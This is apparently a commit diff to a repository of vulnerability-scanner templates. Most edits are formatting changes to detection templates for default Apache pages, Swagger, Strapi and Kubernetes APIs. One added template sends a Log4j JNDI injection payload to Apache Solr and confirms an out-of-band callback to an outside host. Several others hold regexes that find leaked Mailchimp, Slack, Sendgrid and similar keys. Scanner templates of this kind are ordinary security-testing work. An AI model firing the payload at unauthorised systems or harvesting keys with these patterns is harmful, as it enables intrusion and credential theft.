20240713

date.txt

@@ -1 +1 @@
-20240712
+20240713

poc/apache/apache-solr-log4j-cve-2021-44228.yaml

@@ -0,0 +1,22 @@
+id: apache-solr-log4j-CVE-2021-44228
+
+info:
+  name: Log4j (CVE-2021-44228) Detect for Apache Solr 
+  author: toramanemre
+  severity: Critical
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/solr/admin/collections?action=${jndi:ldap://{{interactsh-url}}}&wt=json"
+
+    headers:
+      Host: "{{Host}}"
+
+    matchers:
+
+      - type: word
+        part: interactsh_protocol
+        name: dns
+        words:
+          - "dns"

poc/apache/default-apache-test-all-6814.yaml

@@ -3,20 +3,20 @@ id: default-apache-test-all
 info:
   name: Apache HTTP Server Test Page
   author: andydoering
-  description: Detects default installations of apache (not just apache2 or installations on CentOS)
   severity: info
-  tags: tech,apache
+  description: Detects default installations of apache (not just apache2 or installations on CentOS)
   metadata:
     shodan-query: http.title:"Apache+Default","Apache+HTTP+Server+Test","Apache2+It+works"
+  tags: tech,apache
 
 requests:
   - method: GET
     path:
       - '{{BaseURL}}'
 
     matchers:
-      - type: regex # type of the extractor
-        part: body  # part of the response (header,body,all)
+      - type: regex  # type of the extractor
+        part: body   # part of the response (header,body,all)
         condition: or
         regex:
           - "<title>.*?Apache(|\\d+) .*?(Default|Test).*?</title>"
@@ -26,4 +26,4 @@ requests:
       - type: kval
         part: header
         kval:
-          - server
+          - server

poc/apache/default-apache2-page-6804.yaml

@@ -1,17 +1,15 @@
 id: default-apache2-page
-
 info:
   name: Apache2 Default Test Page
   author: dhiyaneshDk
   severity: info
+  reference:
+    - https://www.shodan.io/search?query=http.title%3A%22Apache2+Debian+Default+Page%3A+It+works%22
   tags: tech,apache
-  reference: https://www.shodan.io/search?query=http.title%3A%22Apache2+Debian+Default+Page%3A+It+works%22
-
 requests:
   - method: GET
     path:
       - '{{BaseURL}}'
-
     matchers:
       - type: word
         words:

poc/apache/default-apache2-ubuntu-page-6809.yaml

@@ -1,11 +1,12 @@
 id: default-apache2-ubuntu-page
+
 info:
   name: Apache2 Ubuntu Default Page
   author: dhiyaneshDk
   severity: info
-  reference:
-    - https://www.shodan.io/search?query=http.title%3A%22Apache2+Ubuntu+Default+Page%22
   tags: tech,apache
+  reference: https://www.shodan.io/search?query=http.title%3A%22Apache2+Ubuntu+Default+Page%22
+
 requests:
   - method: GET
     path:

poc/api/google-api(1).yaml

@@ -1,15 +1,12 @@
 id: google-api-key-file
-
 info:
   name: Google API key
   author: gaurang
   severity: info
   tags: token,file,google
-
 file:
   - extensions:
       - all
-
     extractors:
       - type: regex
         regex:

poc/api/graylog-api-browser-7847.yaml

@@ -4,11 +4,13 @@ info:
   name: Detect Graylog REST API
   author: PR3R00T
   severity: info
+  tags: tech,graylog
 
 requests:
   - method: GET
     path:
       - "{{BaseURL}}/api/api-browser/"
+
     matchers-condition: and
     matchers:
       - type: word
@@ -18,6 +20,7 @@ requests:
           - "REST API browser"
           - "swagger"
         condition: and
+
       - type: status
         status:
           - 200

poc/api/kube-api-pods-8510.yaml

@@ -1,5 +1,4 @@
 id: kube-api-pods
-
 info:
   name: Kube API Pods
   author: sharath

poc/api/kube-api-services-8514.yaml

@@ -1,4 +1,5 @@
 id: kube-api-services
+
 info:
   name: Kube API Services
   author: sharath

poc/api/mailchimp-api-11854.yaml

@@ -4,7 +4,8 @@ info:
   name: Mailchimp API Key
   author: gaurang
   severity: high
-  tags: keys,file,token,mailchimp
+  tags: token,file,mailchimp
+
 file:
   - extensions:
       - all
@@ -13,4 +14,3 @@ file:
       - type: regex
         regex:
           - "[0-9a-f]{32}-us[0-9]{1,2}"
-# digest: 4a0a00473045022100b7d7dc7f716b2b6aa9f8fc0e8f2455cd4598868f7cdf43257e6359058f2bb4ab02201b98b540e564948f56babb33b53688a32a426e54dc32d0ca159d70eebb798191:922c64590222798bb761d5b6d8e72950

poc/api/mailchimp-api-key-8722.yaml

@@ -1,15 +1,18 @@
-id: mailchimp-access-key-value
-info:
-  name: Mailchimp API Value
-  author: puzzlepeaches
-  severity: info
-  tags: exposure,token,mailchimp
-requests:
-  - method: GET
-    path:
-      - "{{BaseURL}}"
-    extractors:
-      - type: regex
-        part: body
-        regex:
-          - "[0-9a-f]{32}-us[0-9]{1,2}"
+id: mailchimp-access-key-value
+
+info:
+  name: Mailchimp API Value
+  author: puzzlepeaches
+  severity: info
+  tags: exposure,token,mailchimp
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}"
+
+    extractors:
+      - type: regex
+        part: body
+        regex:
+          - "[0-9a-f]{32}-us[0-9]{1,2}"

poc/api/mailgun-api(1).yaml

@@ -1,15 +1,12 @@
 id: mailgun-api-key
-
 info:
   name: Mailgun API Key
   author: gaurang
   severity: high
   tags: token,file,mailgun
-
 file:
   - extensions:
       - all
-
     extractors:
       - type: regex
         regex:

poc/api/sendgrid-api-11859.yaml

@@ -1,13 +1,16 @@
 id: sendgrid-api-key-file
+
 info:
   name: Sendgrid API Key
   author: gaurang
   severity: high
-  tags: token,file,sendgrid
+  tags: keys,file,token,sendgrid
 file:
   - extensions:
       - all
+
     extractors:
       - type: regex
         regex:
           - "SG\\.[a-zA-Z0-9]{22}\\.[a-zA-Z0-9]{43}"
+# digest: 4b0a00483046022100d3c8e8d194bf1de6ea48f9c0ed47cf49cc66a5f44195732b29617199ae5a360b022100d00c1fa924b6444959e020764b71559bc85f140c3c912d76e0fc6c35abe161d9:922c64590222798bb761d5b6d8e72950

poc/api/slack-api-11864.yaml

@@ -4,8 +4,7 @@ info:
   name: Slack API Key
   author: gaurang
   severity: high
-  tags: token,file,slack
-
+  tags: file,keys,token,slack
 file:
   - extensions:
       - all
@@ -14,3 +13,4 @@ file:
       - type: regex
         regex:
           - "xox[baprs]-([0-9a-zA-Z]{10,48})?"
+# digest: 4a0a004730450220098e1929b6ec4c0b3e189cebf5142b7ee75dfd23c8c9303e1a9b43f25e00c94b02210094541a8012719eec9a5b6fb643a3ef4050a67ef02165ba3eb94120d6458fb5c7:922c64590222798bb761d5b6d8e72950

poc/api/strapi-cms-detect-10538.yaml

@@ -1,22 +1,36 @@
 id: strapi-cms-detect
 
 info:
-  name: strapi CMS detect
-  author: cyllective
+  name: Strapi CMS detect
+  author: cyllective,daffainfo,idealphase
   severity: info
-  description: Detects strapi CMS
-  tags: tech,strapi,cms
+  description: Open source Node.js Headless CMS to easily build customisable APIs
   reference:
     - https://github.com/strapi/strapi
+  tags: tech,strapi,cms
 
 requests:
   - method: GET
     path:
-      - "{{BaseURL}}/admin/auth/login"
+      - "{{BaseURL}}/admin/init"
 
+    matchers-condition: and
     matchers:
       - type: word
         part: body
-        condition: or
         words:
-          - '<title>Strapi Admin</title>'
+          - '"data"'
+          - '"uuid"'
+          - '"hasAdmin"'
+        condition: and
+
+      - type: status
+        status:
+          - 200
+
+    extractors:
+      - type: regex
+        part: body
+        group: 1
+        regex:
+          - '"strapiVersion":"([0-9.]+)"'

poc/api/strapi-page-10545.yaml

@@ -1,17 +1,14 @@
 id: strapi-page
-
 info:
   name: Strapi Page
   author: dhiyaneshDk
   severity: info
   reference: https://www.shodan.io/search?query=http.title%3A%22Welcome+to+your+Strapi+app%22
   tags: api,strapi
-
 requests:
   - method: GET
     path:
       - '{{BaseURL}}'
-
     matchers:
       - type: word
         words:

poc/api/swagger-api-10592.yaml

@@ -1,60 +1,16 @@
 id: swagger-api
+
 info:
   name: Public Swagger API
-  author: pdteam,c-sh0
+  author: pdteam
   severity: info
   tags: exposure,api,swagger
+
 requests:
   - method: GET
     path:
-      - "{{BaseURL}}/swagger-ui/swagger-ui.js"
-      - "{{BaseURL}}/swagger/swagger-ui.js"
-      - "{{BaseURL}}/swagger-ui.js"
-      - "{{BaseURL}}/swagger/ui/swagger-ui.js"
-      - "{{BaseURL}}/swagger/ui/index"
-      - "{{BaseURL}}/swagger/index.html"
-      - "{{BaseURL}}/swagger-ui.html"
-      - "{{BaseURL}}/swagger/swagger-ui.html"
-      - "{{BaseURL}}/api/swagger-ui.html"
-      - "{{BaseURL}}/api-docs/swagger.json"
-      - "{{BaseURL}}/api-docs/swagger.yaml"
-      - "{{BaseURL}}/api_docs"
-      - "{{BaseURL}}/swagger.json"
-      - "{{BaseURL}}/swagger.yaml"
-      - "{{BaseURL}}/swagger/v1/swagger.json"
-      - "{{BaseURL}}/swagger/v1/swagger.yaml"
-      - "{{BaseURL}}/api/index.html"
-      - "{{BaseURL}}/api/docs/"
-      - "{{BaseURL}}/api/swagger.json"
-      - "{{BaseURL}}/api/swagger.yaml"
-      - "{{BaseURL}}/api/swagger.yml"
-      - "{{BaseURL}}/api/swagger/index.html"
-      - "{{BaseURL}}/api/swagger/swagger-ui.html"
-      - "{{BaseURL}}/api/api-docs/swagger.json"
-      - "{{BaseURL}}/api/api-docs/swagger.yaml"
-      - "{{BaseURL}}/api/swagger-ui/swagger.json"
-      - "{{BaseURL}}/api/swagger-ui/swagger.yaml"
-      - "{{BaseURL}}/api/apidocs/swagger.json"
-      - "{{BaseURL}}/api/apidocs/swagger.yaml"
-      - "{{BaseURL}}/api/swagger-ui/api-docs"
-      - "{{BaseURL}}/api/api-docs"
-      - "{{BaseURL}}/api/apidocs"
-      - "{{BaseURL}}/api/swagger"
-      - "{{BaseURL}}/api/swagger/static/index.html"
-      - "{{BaseURL}}/api/swagger-resources"
-      - "{{BaseURL}}/api/swagger-resources/restservices/v2/api-docs"
-      - "{{BaseURL}}/api/__swagger__/"
-      - "{{BaseURL}}/api/_swagger_/"
-      - "{{BaseURL}}/api/spec/swagger.json"
-      - "{{BaseURL}}/api/spec/swagger.yaml"
-      - "{{BaseURL}}/api/swagger/ui/index"
-      - "{{BaseURL}}/__swagger__/"
-      - "{{BaseURL}}/_swagger_/"
-      - "{{BaseURL}}/api/v1/swagger-ui/swagger.json"
-      - "{{BaseURL}}/api/v1/swagger-ui/swagger.yaml"
-      - "{{BaseURL}}/swagger-resources/restservices/v2/api-docs"
-      - "{{BaseURL}}/api/swagger_doc.json"
-    stop-at-first-match: true
+      - "{{BaseURL}}/reporting/swagger/index.html"
+
     matchers-condition: and
     matchers:
       - type: word
@@ -65,12 +21,8 @@ requests:
           - "Swagger UI"
           - "**token**:"
         condition: or
+
       - type: status
         status:
           - 200
-    extractors:
-      - type: regex
-        part: body
-        group: 1
-        regex:
-          - " @version (v[0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3})"
+